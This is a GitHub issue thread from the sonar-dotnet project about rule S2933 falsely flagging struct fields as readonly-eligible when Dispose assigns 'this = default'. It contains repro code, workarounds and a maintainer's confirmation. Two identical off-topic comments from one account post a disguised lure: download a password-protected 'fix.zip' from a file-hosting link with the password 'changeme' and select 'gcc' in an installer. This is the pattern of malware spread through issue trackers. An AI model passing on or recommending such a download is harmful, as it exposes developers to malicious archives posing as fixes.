### ISSUE TITLE
NET-1548 Fix S2933 FP: readonly fields in a struct re-assigned with 'this'

### ISSUE THREAD

**Issue by fiotti** [SonarSource/sonar-dotnet#9657]
### Description

S2933 disagrees with [IDE0064](https://learn.microsoft.com/dotnet/fundamentals/code-analysis/style-rules/ide0064).

### Repro steps

```csharp
struct Buffer : IDisposable
{
    byte[]? _rented; // S2933: Make '_rented' 'readonly'.
    byte[] _bytes; // S2933: Make '_bytes' 'readonly'.

    public byte[] Data => _bytes;

    public Buffer(byte[] buffer)
    {
        _bytes = buffer;
    }

    public Buffer(int capacity)
    {
        _rented = ArrayPool<byte>.Shared.Rent(capacity);
        _bytes = _rented;
    }

    public void Dispose()
    {
        if (_rented != null)
            ArrayPool<byte>.Shared.Return(_rented);

        this = default; // <-- Look here.
    }
}
```

But after adding the `readonly` modifiers, Visual Studio complains with:
> IDE0064: Struct contains assignment to 'this' outside of costructor. Make readonly fields writable.

### Expected behavior

I would expect SonarLint to either disable IDE0064 or not report this case at all.

[According to Microsoft](https://learn.microsoft.com/dotnet/fundamentals/code-analysis/style-rules/ide0064) it is incorrect to add the `readonly` modifiers in this case.

### Actual behavior

SonarLint reports a warning.

### Known workarounds

```csharp
#pragma warning disable S2933
```

or

```csharp
#pragma warning disable IDE0064
```

or

```diff
 public void Dispose()
 {
     if (_rented != null)
         ArrayPool<byte>.Shared.Return(_rented);

-    this = default; // <-- Look here.
+    _rented = null;
+    _bytes = null!;
 }
```

### Related information

* SonarLint for Visual Studio 2022, version 8.9.0.92083
* Visual Studio Professional 2022 (64 bit), version 17.10.4
* dotnet 8.0.303
* MSBuild version 17.10.4+10fbfbf2e for .NET Framework, version 17.10.4.21802
* Windows 11 Pro 23H2 22631.3880

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zsolt-kolbay-sonarsource** [comment]
Hi @fiotti. Thank you for reporting the issue. Confirmed as False Positive.

Out of curiosity: why do you use a struct instead of a class in the code sample? Creating an `IDisposable` struct sounds dangerous, as it's passed by value (copied).

```cs
var buf = new Buffer();
using (var insideBuffer = new Buffer(1000))
{
   buf = insideBuffer;
}
// After this line buf._rented will point to a memory location that's no longer usable.
```

**Comment by pavel-mikula-sonarsource** [comment]
Internal ticket [NET-1548](https://sonarsource.atlassian.net/browse/NET-1548)

[NET-1548]: https://sonarsource.atlassian.net/browse/NET-1548?atlOrigin=eyJpIjoiNWRkNTljNzYxNjVmNDY3MDlhMDU5Y2ZhYzA5YTRkZjUiLCJwIjoiZ2l0aHViLWNvbS1KU1cifQ
